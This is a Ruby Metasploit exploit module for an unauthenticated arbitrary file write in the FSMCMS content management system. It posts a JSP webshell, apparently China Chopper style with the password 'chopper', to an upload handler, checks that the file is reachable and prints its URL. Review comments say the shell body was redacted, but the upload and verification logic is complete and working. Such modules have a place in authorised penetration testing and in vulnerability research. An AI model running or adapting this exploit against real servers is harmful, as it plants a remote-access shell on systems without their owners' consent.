require 'msf/core'
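class MetasploitModule < Msf::Exploit::Remote
  # FSMCMS unauthenticated arbitrary file write.
  #
  # cms/client/uploadpic_html.jsp accepts a POST without any authentication and
  # stores the request body at a location derived from the `toname` and
  # `diskno` query parameters. The module uses that to drop a JSP (a China
  # Chopper style shell, password "chopper") under cms-data/temp_dir and then
  # fetches it back to confirm the write succeeded.
  #
  # NOTE(review): this module does not deliver a Metasploit payload and does
  # not open a session; it only prints the URL of the dropped JSP. The shell
  # body in `payload_data` has been redacted in this copy of the source.
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  # Path segments (under TARGETURI) of the vulnerable upload handler.
  UPLOAD_PATH = %w[cms client uploadpic_html.jsp].freeze
  # Path segments under which uploads land: cms-data/temp_dir/<diskno>/temp.files/<toname>.
  TEMP_DIR_PATH = %w[cms-data temp_dir].freeze
  # Per-request timeout in seconds (kept at the original PoC's value).
  HTTP_TIMEOUT = 4

  def initialize(info = {})
    super(update_info(info,
      # The original name carried a leading tab, which showed up in module listings.
      'Name' => 'FSMCMS系统任意文件写入',
      'Description' => %q{
                            无需登录等认证即可上传文件,默认上传菜刀马，密码chopper
      },
      'Author' => ['路人甲', '扶摇直上打飞机'],
      'License' => MSF_LICENSE,
      'References' => [
        # Metasploit's reference context ids are case-sensitive: 'url' renders as an
        # unknown reference, 'URL' renders as a clickable link.
        ['URL', 'http://www.wooyun.org/bugs/wooyun-2015-0144274']
      ],
      # The dropped JSP runs as the servlet container's account; nothing in this
      # module escalates privileges, so it must not be advertised as privileged.
      'Privileged' => false,
      'Platform' => ['linux'],
      'Targets' => [['all of them', {}]],
      'Arch' => ARCH_JAVA,
      'DefaultTarget' => 0
    ))
    register_options(
      [
        Opt::RHOST(),
        Opt::RPORT(80),
        # Description previously referred to "the Centreon Application" (copy-paste leftover).
        OptString.new('TARGETURI', [true, 'Base path of the FSMCMS application', '/'])
      ], self.class)
  end

  # Random `diskno` directory and `toname` basename (6 alphanumerics each) so
  # repeated runs do not collide on the target filesystem.
  #
  # @return [Array(String, String)] [directory, basename]
  def rand_file_info
    [rand_text_alphanumeric(6), rand_text_alphanumeric(6)]
  end

  # Body written verbatim into the uploaded JSP. Only the XML wrapper remains in
  # this copy of the source; the webshell itself was redacted.
  #
  # @return [String]
  def payload_data
    '<?xml version="1.0" encoding="UTF-8"?><root>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</root>'
  end

  # URI of the upload handler. normalize_uri avoids the "//cms/..." path the
  # original produced with the default TARGETURI of "/".
  #
  # @return [String]
  def upload_uri
    normalize_uri(target_uri.path, *UPLOAD_PATH)
  end

  # URI where the upload is stored for a given diskno/toname pair.
  #
  # @param file_path [String] the `diskno` value
  # @param file_name [String] the `toname` value without the .jsp suffix
  # @return [String]
  def dropped_file_uri(file_path, file_name)
    normalize_uri(target_uri.path, *TEMP_DIR_PATH, file_path, 'temp.files', "#{file_name}.jsp")
  end

  # Upload the JSP and verify the server serves it back.
  #
  # @return [String, nil] full URL of the dropped file, or nil when the upload
  #   request got no response or the file is not reachable afterwards
  def post_data
    file_path, file_name = rand_file_info
    print_status('start to exploit ....')

    res = send_request_cgi({
      'method' => 'POST',
      'uri' => upload_uri,
      'vars_get' => { 'toname' => "#{file_name}.jsp", 'diskno' => file_path },
      'data' => payload_data,
      'headers' => {
        'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0',
        # The PoC sends a boundary-less multipart content type with a raw body;
        # kept as-is because that is what the handler was observed to accept.
        'Content-Type' => 'multipart/form-data;'
      }
    }, HTTP_TIMEOUT)
    unless res
      print_error('no response from the upload endpoint')
      return nil
    end

    check_uri = dropped_file_uri(file_path, file_name)
    check_res = send_request_raw({ 'uri' => check_uri }, HTTP_TIMEOUT)
    # Response#code is an Integer. The original compared it with the String
    # '404', which is never equal, so every run was reported as a success and a
    # nil response (connection failure) raised NoMethodError.
    return nil unless check_res && check_res.code == 200

    scheme = datastore['SSL'] ? 'https' : 'http'
    "#{scheme}://#{rhost}:#{rport}#{check_uri}"
  end

  # Entry point: drop the JSP and report its URL, or fail the run.
  def exploit
    file_url = post_data
    fail_with(Failure::Unknown, 'cannot exploit target ~_~') unless file_url

    print_good('finished exploit ^_^')
    print_good(file_url)
    print_good('菜刀链接密码为chopper')
  end

  # Legacy accessor kept for compatibility; new code should use target_uri.path.
  def targeturi
    datastore['TARGETURI']
  end
end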